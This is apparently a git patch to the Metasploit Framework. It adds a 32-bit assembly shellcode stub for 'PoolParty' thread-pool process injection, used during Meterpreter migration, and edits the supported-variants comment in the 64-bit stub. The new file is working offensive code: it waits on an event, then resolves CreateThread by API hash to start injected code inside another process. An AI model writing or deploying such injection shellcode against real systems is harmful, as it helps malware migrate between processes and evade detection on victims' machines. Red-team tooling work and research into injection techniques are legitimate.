From c5fd212334f3441d8edb3ee193dc22f293c64e08 Mon Sep 17 00:00:00 2001 From: dledda-r7 Date: Thu, 8 Jan 2026 05:15:28 -0500 Subject: [PATCH] docs: add poolparty 32-bit, update poolparty 64-bit stubs --- .../windows/x64/src/migrate/poolparty.asm | 1 - .../windows/x86/src/migrate/poolparty.asm | 81 +++++++++++++++++++ 2 files changed, 81 insertions(+), 1 deletion(-) create mode 100644 external/source/shellcode/windows/x86/src/migrate/poolparty.asm diff --git a/external/source/shellcode/windows/x64/src/migrate/poolparty.asm b/external/source/shellcode/windows/x64/src/migrate/poolparty.asm index 844f333df5..5192d576a8 100644 --- a/external/source/shellcode/windows/x64/src/migrate/poolparty.asm +++ b/external/source/shellcode/windows/x64/src/migrate/poolparty.asm @@ -35,7 +35,6 @@ ; We are starting the process in SUSPENDED mode and then Resuming it, here we need to wait for an event. ; This shellcode is done to work with multiple PoolParty variants. ; Supported Variants: -; - TP Wait Insertion ; - TP Direct Insertion [BITS 64] diff --git a/external/source/shellcode/windows/x86/src/migrate/poolparty.asm b/external/source/shellcode/windows/x86/src/migrate/poolparty.asm new file mode 100644 index 0000000000..7b1ed2e093 --- /dev/null +++ b/external/source/shellcode/windows/x86/src/migrate/poolparty.asm @@ -0,0 +1,81 @@ +;-----------------------------------------------------------------------------; +; Author: Muzaffer Umut ŞAHİN +; Compatible: Windows 11, 10 +; Architecture: x86 +; Version: 0.1 (Jan 2026) +; Size: 206 bytes +; Build: >build.py poolparty +;-----------------------------------------------------------------------------; + +; Stub helper for pool-party injection. + +;typedef struct _POOLPARTYCTX +;{ +; union +; { +; LPVOID lpStartAddress; +; BYTE bPadding1[8]; +; } s; +; union +; { +; LPVOID lpParameter; +; BYTE bPadding2[8]; +; } p; +; union +; { +; LPVOID hEventTrigger; +; BYTE bPadding2[8]; +; } e; +; +;} POOLPARTYCTX, * LPPOOLPARTYCTX; +; Description: +; This stub is executed during the Meterpreter migration and DLL Injection. The POOLPARTYCTX must be allocated ALWAYS at the end of the shellcode, +; this is mandatory as some pool-party variants doesn't support arguments passing. Also an hEventTrigger during migration is mandatory because +; we need to wait the ok from the previous Meterpreter to continue the execution. with other techniques (RemoteThread and APC) +; We are starting the process in SUSPENDED mode and then Resuming it, here we need to wait for an event. +; This shellcode is done to work with multiple PoolParty variants. +; Supported Variants: +; - Worker Factory Overwrite + +[BITS 32] + + push ebp + push ebx + push edi + push esi ; save registers + mov esi,esp + cld + jmp _parameters +_main: + pop ebp ; get block api in ebp and POOLPARTYCTX in ebx + push -1 ; dwMilliSeconds = INFINTE + push dword [ebx+16] ; hEventTrigger + push 0x601D8708 ; hash("kernel32.dll","WaitForSingleObject") + call ebp ; WaitForSingleObject(hEventTrigger, INFINITE); + xor edi,edi ; Clear edi + push edi ; lpThreadId + push edi ; dwCreationFlags + push dword [ebx+8] ; lpParameter + push dword [ebx] ; lpStartAddress + push edi ; dwStackSize + push edi ; lpThreadAttributes + push 0x160D6838 ; hash("kernel32.dll","CreateThread") + call ebp ; CreateThread(NULL, 0, ctx->lpStartAddress, ctx->lpParameter, 0, NULL); +restore: + mov esp,esi ; restore stack + pop esi + pop edi + pop ebx + pop ebp ; restore registers + ret + +get_blockapi: + call _main +%include "./../block/block_api.asm" + +_cb_parameters: + pop ebx + call get_blockapi + +_parameters: + call _cb_parameters